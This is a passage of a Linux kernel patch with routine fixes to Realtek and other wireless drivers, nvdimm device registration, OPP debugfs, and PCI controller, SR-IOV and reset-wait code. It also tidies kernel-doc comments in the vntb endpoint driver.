+diff --git a/drivers/net/wireless/realtek/rtw88/coex.c b/drivers/net/wireless/realtek/rtw88/coex.c
+index 6276ad6242991..a82476f47a7c4 100644
+--- a/drivers/net/wireless/realtek/rtw88/coex.c
++++ b/drivers/net/wireless/realtek/rtw88/coex.c
+@@ -4057,7 +4057,7 @@ void rtw_coex_display_coex_info(struct rtw_dev *rtwdev, struct seq_file *m)
+ 		   rtwdev->stats.tx_throughput, rtwdev->stats.rx_throughput);
+ 	seq_printf(m, "%-40s = %u/ %u/ %u\n",
+ 		   "IPS/ Low Power/ PS mode",
+-		   test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags),
++		   !test_bit(RTW_FLAG_POWERON, rtwdev->flags),
+ 		   test_bit(RTW_FLAG_LEISURE_PS_DEEP, rtwdev->flags),
+ 		   rtwdev->lps_conf.mode);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index 52076e89d59a3..2afe64f2abe69 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -273,6 +273,11 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+ 		return -EINVAL;
+ 
++	if (pwr_on)
++		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
++	else
++		clear_bit(RTW_FLAG_POWERON, rtwdev->flags);
++
+ 	return 0;
+ }
+ 
+@@ -335,6 +340,11 @@ int rtw_mac_power_on(struct rtw_dev *rtwdev)
+ 	ret = rtw_mac_power_switch(rtwdev, true);
+ 	if (ret == -EALREADY) {
+ 		rtw_mac_power_switch(rtwdev, false);
++
++		ret = rtw_mac_pre_system_cfg(rtwdev);
++		if (ret)
++			goto err;
++
+ 		ret = rtw_mac_power_switch(rtwdev, true);
+ 		if (ret)
+ 			goto err;
+diff --git a/drivers/net/wireless/realtek/rtw88/main.h b/drivers/net/wireless/realtek/rtw88/main.h
+index bccd7b28f60c7..cd9c068ae1a78 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.h
++++ b/drivers/net/wireless/realtek/rtw88/main.h
+@@ -356,7 +356,7 @@ enum rtw_flags {
+ 	RTW_FLAG_RUNNING,
+ 	RTW_FLAG_FW_RUNNING,
+ 	RTW_FLAG_SCANNING,
+-	RTW_FLAG_INACTIVE_PS,
++	RTW_FLAG_POWERON,
+ 	RTW_FLAG_LEISURE_PS,
+ 	RTW_FLAG_LEISURE_PS_DEEP,
+ 	RTW_FLAG_DIG_DISABLE,
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.c b/drivers/net/wireless/realtek/rtw88/ps.c
+index c93da743681fc..dc0d852182454 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.c
++++ b/drivers/net/wireless/realtek/rtw88/ps.c
+@@ -25,7 +25,7 @@ static int rtw_ips_pwr_up(struct rtw_dev *rtwdev)
+ 
+ int rtw_enter_ips(struct rtw_dev *rtwdev)
+ {
+-	if (test_and_set_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_coex_ips_notify(rtwdev, COEX_IPS_ENTER);
+@@ -50,7 +50,7 @@ int rtw_leave_ips(struct rtw_dev *rtwdev)
+ {
+ 	int ret;
+ 
+-	if (!test_and_clear_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_hci_link_ps(rtwdev, false);
+diff --git a/drivers/net/wireless/realtek/rtw88/wow.c b/drivers/net/wireless/realtek/rtw88/wow.c
+index 89dc595094d5c..16ddee577efec 100644
+--- a/drivers/net/wireless/realtek/rtw88/wow.c
++++ b/drivers/net/wireless/realtek/rtw88/wow.c
+@@ -592,7 +592,7 @@ static int rtw_wow_leave_no_link_ps(struct rtw_dev *rtwdev)
+ 		if (rtw_get_lps_deep_mode(rtwdev) != LPS_DEEP_MODE_NONE)
+ 			rtw_leave_lps_deep(rtwdev);
+ 	} else {
+-		if (test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags)) {
++		if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags)) {
+ 			rtw_wow->ips_enabled = true;
+ 			ret = rtw_leave_ips(rtwdev);
+ 			if (ret)
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index ad420d7ec8af9..a703bb70b8f55 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3047,6 +3047,8 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	INIT_DELAYED_WORK(&rtwdev->cfo_track_work, rtw89_phy_cfo_track_work);
+ 	INIT_DELAYED_WORK(&rtwdev->forbid_ba_work, rtw89_forbid_ba_work);
+ 	rtwdev->txq_wq = alloc_workqueue("rtw89_tx_wq", WQ_UNBOUND | WQ_HIGHPRI, 0);
++	if (!rtwdev->txq_wq)
++		return -ENOMEM;
+ 	spin_lock_init(&rtwdev->ba_lock);
+ 	spin_lock_init(&rtwdev->rpwm_lock);
+ 	mutex_init(&rtwdev->mutex);
+@@ -3070,6 +3072,7 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	ret = rtw89_load_firmware(rtwdev);
+ 	if (ret) {
+ 		rtw89_warn(rtwdev, "no firmware loaded\n");
++		destroy_workqueue(rtwdev->txq_wq);
+ 		return ret;
+ 	}
+ 	rtw89_ser_init(rtwdev);
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 730e83d54257f..50701c55ed602 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -594,6 +594,7 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 	struct seq_file *m = (struct seq_file *)filp->private_data;
+ 	struct rtw89_debugfs_priv *debugfs_priv = m->private;
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
++	const struct rtw89_chip_info *chip = rtwdev->chip;
+ 	char buf[32];
+ 	size_t buf_size;
+ 	int sel;
+@@ -613,6 +614,12 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 		return -EINVAL;
+ 	}
+ 
++	if (sel == RTW89_DBG_SEL_MAC_30 && chip->chip_id != RTL8852C) {
++		rtw89_info(rtwdev, "sel %d is address hole on chip %d\n", sel,
++			   chip->chip_id);
++		return -EINVAL;
++	}
++
+ 	debugfs_priv->cb_data = sel;
+ 	rtw89_info(rtwdev, "select mac page dump %d\n", debugfs_priv->cb_data);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/fw.c b/drivers/net/wireless/realtek/rtw89/fw.c
+index d57e3610fb88e..1d57a8c5e97df 100644
+--- a/drivers/net/wireless/realtek/rtw89/fw.c
++++ b/drivers/net/wireless/realtek/rtw89/fw.c
+@@ -2525,8 +2525,10 @@ static int rtw89_append_probe_req_ie(struct rtw89_dev *rtwdev,
+ 
+ 		list_add_tail(&info->list, &scan_info->pkt_list[band]);
+ 		ret = rtw89_fw_h2c_add_pkt_offload(rtwdev, &info->id, new);
+-		if (ret)
++		if (ret) {
++			kfree_skb(new);
+ 			goto out;
++		}
+ 
+ 		kfree_skb(new);
+ 	}
+diff --git a/drivers/net/wireless/realtek/rtw89/reg.h b/drivers/net/wireless/realtek/rtw89/reg.h
+index ca20bb024b407..0291aff940166 100644
+--- a/drivers/net/wireless/realtek/rtw89/reg.h
++++ b/drivers/net/wireless/realtek/rtw89/reg.h
+@@ -3374,6 +3374,8 @@
+ #define RR_TXRSV_GAPK BIT(19)
+ #define RR_BIAS 0x5e
+ #define RR_BIAS_GAPK BIT(19)
++#define RR_TXAC 0x5f
++#define RR_TXAC_IQG GENMASK(3, 0)
+ #define RR_BIASA 0x60
+ #define RR_BIASA_TXG GENMASK(15, 12)
+ #define RR_BIASA_TXA GENMASK(19, 16)
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+index 006c2cf931116..98428f17814f5 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+@@ -338,7 +338,7 @@ static void _dack_reload_by_path(struct rtw89_dev *rtwdev,
+ 		(dack->dadck_d[path][index] << 14);
+ 	addr = 0xc210 + offset;
+ 	rtw89_phy_write32(rtwdev, addr, val32);
+-	rtw89_phy_write32_set(rtwdev, addr, BIT(1));
++	rtw89_phy_write32_set(rtwdev, addr, BIT(0));
+ }
+ 
+ static void _dack_reload(struct rtw89_dev *rtwdev, enum rtw89_rf_path path)
+@@ -1873,12 +1873,11 @@ static void _dpk_rf_setting(struct rtw89_dev *rtwdev, u8 gain,
+ 			       0x50101 | BIT(rtwdev->dbcc_en));
+ 		rtw89_write_rf(rtwdev, path, RR_MOD_V1, RR_MOD_MASK, RF_DPK);
+ 
+-		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161) {
++		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161)
+ 			rtw89_write_rf(rtwdev, path, RR_IQGEN, RR_IQGEN_BIAS, 0x8);
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		} else {
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		}
++
++		rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
++		rtw89_write_rf(rtwdev, path, RR_TXAC, RR_TXAC_IQG, 0x8);
+ 
+ 		rtw89_write_rf(rtwdev, path, RR_RXA2, RR_RXA2_ATT, 0x0);
+ 		rtw89_write_rf(rtwdev, path, RR_TXIQK, RR_TXIQK_ATT2, 0x3);
+diff --git a/drivers/net/wireless/rsi/rsi_91x_coex.c b/drivers/net/wireless/rsi/rsi_91x_coex.c
+index 8a3d86897ea8e..45ac9371f2621 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_coex.c
++++ b/drivers/net/wireless/rsi/rsi_91x_coex.c
+@@ -160,6 +160,7 @@ int rsi_coex_attach(struct rsi_common *common)
+ 			       rsi_coex_scheduler_thread,
+ 			       "Coex-Tx-Thread")) {
+ 		rsi_dbg(ERR_ZONE, "%s: Unable to init tx thrd\n", __func__);
++		kfree(coex_cb);
+ 		return -EINVAL;
+ 	}
+ 	return 0;
+diff --git a/drivers/net/wireless/wl3501_cs.c b/drivers/net/wireless/wl3501_cs.c
+index 1b532e00a56fb..7fb2f95134760 100644
+--- a/drivers/net/wireless/wl3501_cs.c
++++ b/drivers/net/wireless/wl3501_cs.c
+@@ -1328,7 +1328,7 @@ static netdev_tx_t wl3501_hard_start_xmit(struct sk_buff *skb,
+ 	} else {
+ 		++dev->stats.tx_packets;
+ 		dev->stats.tx_bytes += skb->len;
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 
+ 		if (this->tx_buffer_cnt < 2)
+ 			netif_stop_queue(dev);
+diff --git a/drivers/nvdimm/bus.c b/drivers/nvdimm/bus.c
+index b38d0355b0ac3..5ad49056921b5 100644
+--- a/drivers/nvdimm/bus.c
++++ b/drivers/nvdimm/bus.c
+@@ -508,7 +508,7 @@ static void nd_async_device_unregister(void *d, async_cookie_t cookie)
+ 	put_device(dev);
+ }
+ 
+-void nd_device_register(struct device *dev)
++static void __nd_device_register(struct device *dev, bool sync)
+ {
+ 	if (!dev)
+ 		return;
+@@ -531,11 +531,24 @@ void nd_device_register(struct device *dev)
+ 	}
+ 	get_device(dev);
+ 
+-	async_schedule_dev_domain(nd_async_device_register, dev,
+-				  &nd_async_domain);
++	if (sync)
++		nd_async_device_register(dev, 0);
++	else
++		async_schedule_dev_domain(nd_async_device_register, dev,
++					  &nd_async_domain);
++}
++
++void nd_device_register(struct device *dev)
++{
++	__nd_device_register(dev, false);
+ }
+ EXPORT_SYMBOL(nd_device_register);
+ 
++void nd_device_register_sync(struct device *dev)
++{
++	__nd_device_register(dev, true);
++}
++
+ void nd_device_unregister(struct device *dev, enum nd_async_mode mode)
+ {
+ 	bool killed;
+diff --git a/drivers/nvdimm/dimm_devs.c b/drivers/nvdimm/dimm_devs.c
+index c7c9805774911..1634e3c341a90 100644
+--- a/drivers/nvdimm/dimm_devs.c
++++ b/drivers/nvdimm/dimm_devs.c
+@@ -617,7 +617,10 @@ struct nvdimm *__nvdimm_create(struct nvdimm_bus *nvdimm_bus,
+ 	nvdimm->sec.ext_flags = nvdimm_security_flags(nvdimm, NVDIMM_MASTER);
+ 	device_initialize(dev);
+ 	lockdep_set_class(&dev->mutex, &nvdimm_key);
+-	nd_device_register(dev);
++	if (test_bit(NDD_REGISTER_SYNC, &flags))
++		nd_device_register_sync(dev);
++	else
++		nd_device_register(dev);
+ 
+ 	return nvdimm;
+ }
+diff --git a/drivers/nvdimm/nd-core.h b/drivers/nvdimm/nd-core.h
+index cc86ee09d7c08..845408f106556 100644
+--- a/drivers/nvdimm/nd-core.h
++++ b/drivers/nvdimm/nd-core.h
+@@ -107,6 +107,7 @@ int nvdimm_bus_create_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nvdimm_bus_destroy_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nd_synchronize(void);
+ void nd_device_register(struct device *dev);
++void nd_device_register_sync(struct device *dev);
+ struct nd_label_id;
+ char *nd_label_gen_id(struct nd_label_id *label_id, const uuid_t *uuid,
+ 		      u32 flags);
+diff --git a/drivers/opp/debugfs.c b/drivers/opp/debugfs.c
+index 96a30a032c5f9..2c7fb683441ef 100644
+--- a/drivers/opp/debugfs.c
++++ b/drivers/opp/debugfs.c
+@@ -235,7 +235,7 @@ static void opp_migrate_dentry(struct opp_device *opp_dev,
+ 
+ 	dentry = debugfs_rename(rootdir, opp_dev->dentry, rootdir,
+ 				opp_table->dentry_name);
+-	if (!dentry) {
++	if (IS_ERR(dentry)) {
+ 		dev_err(dev, "%s: Failed to rename link from: %s to %s\n",
+ 			__func__, dev_name(opp_dev->dev), dev_name(dev));
+ 		return;
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index f711acacaeaf8..f8e512540fb85 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1527,8 +1527,19 @@ err_deinit:
+ 	return ret;
+ }
+ 
++static void qcom_pcie_host_deinit(struct dw_pcie_rp *pp)
++{
++	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
++	struct qcom_pcie *pcie = to_qcom_pcie(pci);
++
++	qcom_ep_reset_assert(pcie);
++	phy_power_off(pcie->phy);
++	pcie->cfg->ops->deinit(pcie);
++}
++
+ static const struct dw_pcie_host_ops qcom_pcie_dw_ops = {
+-	.host_init = qcom_pcie_host_init,
++	.host_init	= qcom_pcie_host_init,
++	.host_deinit	= qcom_pcie_host_deinit,
+ };
+ 
+ /* Qcom IP rev.: 2.1.0	Synopsys IP rev.: 4.01a */
+diff --git a/drivers/pci/controller/pcie-mt7621.c b/drivers/pci/controller/pcie-mt7621.c
+index ee7aad09d6277..63a5f4463a9f6 100644
+--- a/drivers/pci/controller/pcie-mt7621.c
++++ b/drivers/pci/controller/pcie-mt7621.c
+@@ -60,6 +60,7 @@
+ #define PCIE_PORT_LINKUP		BIT(0)
+ #define PCIE_PORT_CNT			3
+ 
++#define INIT_PORTS_DELAY_MS		100
+ #define PERST_DELAY_MS			100
+ 
+ /**
+@@ -369,6 +370,7 @@ static int mt7621_pcie_init_ports(struct mt7621_pcie *pcie)
+ 		}
+ 	}
+ 
++	msleep(INIT_PORTS_DELAY_MS);
+ 	mt7621_pcie_reset_ep_deassert(pcie);
+ 
+ 	tmp = NULL;
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index fba0179939b8f..8c6931210ac4d 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -11,7 +11,7 @@
+  * Author: Kishon Vijay Abraham I <kishon@ti.com>
+  */
+ 
+-/**
++/*
+  * +------------+         +---------------------------------------+
+  * |            |         |                                       |
+  * +------------+         |                        +--------------+
+@@ -156,12 +156,14 @@ static struct pci_epf_header epf_ntb_header = {
+ };
+ 
+ /**
+- * epf_ntb_link_up() - Raise link_up interrupt to Virtual Host
++ * epf_ntb_link_up() - Raise link_up interrupt to Virtual Host (VHOST)
+  * @ntb: NTB device that facilitates communication between HOST and VHOST
+  * @link_up: true or false indicating Link is UP or Down
+  *
+  * Once NTB function in HOST invoke ntb_link_enable(),
+- * this NTB function driver will trigger a link event to vhost.
++ * this NTB function driver will trigger a link event to VHOST.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_link_up(struct epf_ntb *ntb, bool link_up)
+ {
+@@ -175,9 +177,9 @@ static int epf_ntb_link_up(struct epf_ntb *ntb, bool link_up)
+ }
+ 
+ /**
+- * epf_ntb_configure_mw() - Configure the Outbound Address Space for vhost
+- *   to access the memory window of host
+- * @ntb: NTB device that facilitates communication between host and vhost
++ * epf_ntb_configure_mw() - Configure the Outbound Address Space for VHOST
++ *   to access the memory window of HOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  * @mw: Index of the memory window (either 0, 1, 2 or 3)
+  *
+  *                          EP Outbound Window
+@@ -194,7 +196,9 @@ static int epf_ntb_link_up(struct epf_ntb *ntb, bool link_up)
+  * |        |              |           |
+  * |        |              |           |
+  * +--------+              +-----------+
+- *  VHost                   PCI EP
++ *  VHOST                   PCI EP
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_configure_mw(struct epf_ntb *ntb, u32 mw)
+ {
+@@ -219,7 +223,7 @@ static int epf_ntb_configure_mw(struct epf_ntb *ntb, u32 mw)
+ 
+ /**
+  * epf_ntb_teardown_mw() - Teardown the configured OB ATU
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  * @mw: Index of the memory window (either 0, 1, 2 or 3)
+  *
+  * Teardown the configured OB ATU configured in epf_ntb_configure_mw() using
+@@ -234,12 +238,12 @@ static void epf_ntb_teardown_mw(struct epf_ntb *ntb, u32 mw)
+ }
+ 
+ /**
+- * epf_ntb_cmd_handler() - Handle commands provided by the NTB Host
++ * epf_ntb_cmd_handler() - Handle commands provided by the NTB HOST
+  * @work: work_struct for the epf_ntb_epc
+  *
+  * Workqueue function that gets invoked for the two epf_ntb_epc
+  * periodically (once every 5ms) to see if it has received any commands
+- * from NTB host. The host can send commands to configure doorbell or
++ * from NTB HOST. The HOST can send commands to configure doorbell or
+  * configure memory window or to update link status.
+  */
+ static void epf_ntb_cmd_handler(struct work_struct *work)
+@@ -321,8 +325,8 @@ reset_handler:
+ 
+ /**
+  * epf_ntb_config_sspad_bar_clear() - Clear Config + Self scratchpad BAR
+- * @ntb_epc: EPC associated with one of the HOST which holds peer's outbound
+- *	     address.
++ * @ntb: EPC associated with one of the HOST which holds peer's outbound
++ *	 address.
+  *
+  * Clear BAR0 of EP CONTROLLER 1 which contains the HOST1's config and
+  * self scratchpad region (removes inbound ATU configuration). While BAR0 is
+@@ -331,8 +335,10 @@ reset_handler:
+  * used for self scratchpad from epf_ntb_bar[BAR_CONFIG].
+  *
+  * Please note the self scratchpad region and config region is combined to
+- * a single region and mapped using the same BAR. Also note HOST2's peer
+- * scratchpad is HOST1's self scratchpad.
++ * a single region and mapped using the same BAR. Also note VHOST's peer
++ * scratchpad is HOST's self scratchpad.
++ *
++ * Returns: void
+  */
+ static void epf_ntb_config_sspad_bar_clear(struct epf_ntb *ntb)
+ {
+@@ -347,13 +353,15 @@ static void epf_ntb_config_sspad_bar_clear(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_config_sspad_bar_set() - Set Config + Self scratchpad BAR
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+- * Map BAR0 of EP CONTROLLER 1 which contains the HOST1's config and
++ * Map BAR0 of EP CONTROLLER which contains the VHOST's config and
+  * self scratchpad region.
+  *
+  * Please note the self scratchpad region and config region is combined to
+  * a single region and mapped using the same BAR.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_config_sspad_bar_set(struct epf_ntb *ntb)
+ {
+@@ -380,7 +388,7 @@ static int epf_ntb_config_sspad_bar_set(struct epf_ntb *ntb)
+ /**
+  * epf_ntb_config_spad_bar_free() - Free the physical memory associated with
+  *   config + scratchpad region
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  */
+ static void epf_ntb_config_spad_bar_free(struct epf_ntb *ntb)
+ {
+@@ -393,11 +401,13 @@ static void epf_ntb_config_spad_bar_free(struct epf_ntb *ntb)
+ /**
+  * epf_ntb_config_spad_bar_alloc() - Allocate memory for config + scratchpad
+  *   region
+- * @ntb: NTB device that facilitates communication between HOST1 and HOST2
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Allocate the Local Memory mentioned in the above diagram. The size of
+  * CONFIG REGION is sizeof(struct epf_ntb_ctrl) and size of SCRATCHPAD REGION
+  * is obtained from "spad-count" configfs entry.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_config_spad_bar_alloc(struct epf_ntb *ntb)
+ {
+@@ -465,11 +475,13 @@ static int epf_ntb_config_spad_bar_alloc(struct epf_ntb *ntb)
+ }
+ 
+ /**
+- * epf_ntb_configure_interrupt() - Configure MSI/MSI-X capaiblity
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * epf_ntb_configure_interrupt() - Configure MSI/MSI-X capability
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Configure MSI/MSI-X capability for each interface with number of
+  * interrupts equal to "db_count" configfs entry.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_configure_interrupt(struct epf_ntb *ntb)
+ {
+@@ -511,7 +523,9 @@ static int epf_ntb_configure_interrupt(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_db_bar_init() - Configure Doorbell window BARs
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_db_bar_init(struct epf_ntb *ntb)
+ {
+@@ -566,7 +580,7 @@ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws);
+ /**
+  * epf_ntb_db_bar_clear() - Clear doorbell BAR and free memory
+  *   allocated in peer's outbound address space
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  */
+ static void epf_ntb_db_bar_clear(struct epf_ntb *ntb)
+ {
+@@ -582,8 +596,9 @@ static void epf_ntb_db_bar_clear(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_mw_bar_init() - Configure Memory window BARs
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_mw_bar_init(struct epf_ntb *ntb)
+ {
+@@ -639,7 +654,8 @@ err_alloc_mem:
+ 
+ /**
+  * epf_ntb_mw_bar_clear() - Clear Memory window BARs
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
++ * @num_mws: the number of Memory window BARs that to be cleared
+  */
+ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws)
+ {
+@@ -662,7 +678,7 @@ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws)
+ 
+ /**
+  * epf_ntb_epc_destroy() - Cleanup NTB EPC interface
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Wrapper for epf_ntb_epc_destroy_interface() to cleanup all the NTB interfaces
+  */
+@@ -675,7 +691,9 @@ static void epf_ntb_epc_destroy(struct epf_ntb *ntb)
+ /**
+  * epf_ntb_init_epc_bar() - Identify BARs to be used for each of the NTB
+  * constructs (scratchpad region, doorbell, memorywindow)
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_init_epc_bar(struct epf_ntb *ntb)
+ {
+@@ -716,11 +734,13 @@ static int epf_ntb_init_epc_bar(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_epc_init() - Initialize NTB interface
+- * @ntb: NTB device that facilitates communication between HOST and vHOST2
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Wrapper to initialize a particular EPC interface and start the workqueue
+- * to check for commands from host. This function will write to the
++ * to check for commands from HOST. This function will write to the
+  * EP controller HW for configuring it.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_epc_init(struct epf_ntb *ntb)
+ {
+@@ -787,7 +807,7 @@ err_config_interrupt:
+ 
+ /**
+  * epf_ntb_epc_cleanup() - Cleanup all NTB interfaces
+- * @ntb: NTB device that facilitates communication between HOST1 and HOST2
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Wrapper to cleanup all NTB interfaces.
+  */
+@@ -951,6 +971,8 @@ static const struct config_item_type ntb_group_type = {
+  *
+  * Add configfs directory specific to NTB. This directory will hold
+  * NTB specific properties like db_count, spad_count, num_mws etc.,
++ *
++ * Returns: Pointer to config_group
+  */
+ static struct config_group *epf_ntb_add_cfs(struct pci_epf *epf,
+ 					    struct config_group *group)
+@@ -1292,6 +1314,8 @@ static struct pci_driver vntb_pci_driver = {
+  * Invoked when a primary interface or secondary interface is bound to EPC
+  * device. This function will succeed only when EPC is bound to both the
+  * interfaces.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_bind(struct pci_epf *epf)
+ {
+@@ -1377,6 +1401,8 @@ static struct pci_epf_ops epf_ntb_ops = {
+  *
+  * Probe NTB function driver when endpoint function bus detects a NTB
+  * endpoint function.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_probe(struct pci_epf *epf)
+ {
+diff --git a/drivers/pci/iov.c b/drivers/pci/iov.c
+index 952217572113c..b2e8322755c17 100644
+--- a/drivers/pci/iov.c
++++ b/drivers/pci/iov.c
+@@ -14,7 +14,7 @@
+ #include <linux/delay.h>
+ #include "pci.h"
+ 
+-#define VIRTFN_ID_LEN	16
++#define VIRTFN_ID_LEN	17	/* "virtfn%u\0" for 2^32 - 1 */
+ 
+ int pci_iov_virtfn_bus(struct pci_dev *dev, int vf_id)
+ {
+diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
+index 107d77f3c8467..f47a3b10bf504 100644
+--- a/drivers/pci/pci-driver.c
++++ b/drivers/pci/pci-driver.c
+@@ -572,7 +572,7 @@ static void pci_pm_default_resume_early(struct pci_dev *pci_dev)
+ 
+ static void pci_pm_bridge_power_up_actions(struct pci_dev *pci_dev)
+ {
+-	pci_bridge_wait_for_secondary_bus(pci_dev);
++	pci_bridge_wait_for_secondary_bus(pci_dev, "resume", PCI_RESET_WAIT);
+ 	/*
+ 	 * When powering on a bridge from D3cold, the whole hierarchy may be
+ 	 * powered on into D0uninitialized state, resume them to give them a
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 6d81df459b2f0..c20e95fd48cee 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -167,9 +167,6 @@ static int __init pcie_port_pm_setup(char *str)
+ }
+ __setup("pcie_port_pm=", pcie_port_pm_setup);
+ 
+-/* Time to wait after a reset for device to become responsive */
+-#define PCIE_RESET_READY_POLL_MS 60000
+-
+ /**
+  * pci_bus_max_busnr - returns maximum PCI bus number of given bus' children
+  * @bus: pointer to PCI bus structure to search
+@@ -1174,7 +1171,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 			return -ENOTTY;
+ 		}
+ 
+-		if (delay > 1000)
++		if (delay > PCI_RESET_WAIT)
+ 			pci_info(dev, "not ready %dms after %s; waiting\n",
+ 				 delay - 1, reset_type);
+ 
+@@ -1183,7 +1180,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 		pci_read_config_dword(dev, PCI_COMMAND, &id);
+ 	}
+ 
+-	if (delay > 1000)
++	if (delay > PCI_RESET_WAIT)
+ 		pci_info(dev, "ready %dms after %s\n", delay - 1,
+ 			 reset_type);
+ 
+@@ -4941,24 +4938,31 @@ static int pci_bus_max_d3cold_delay(const struct pci_bus *bus)
+ /**
+  * pci_bridge_wait_for_secondary_bus - Wait for secondary bus to be accessible
+  * @dev: PCI bridge
++ * @reset_type: reset type in human-readable form
++ * @timeout: maximum time to wait for devices on secondary bus (milliseconds)
+  *
+  * Handle necessary delays before access to the devices on the secondary
+- * side of the bridge are permitted after D3cold to D0 transition.
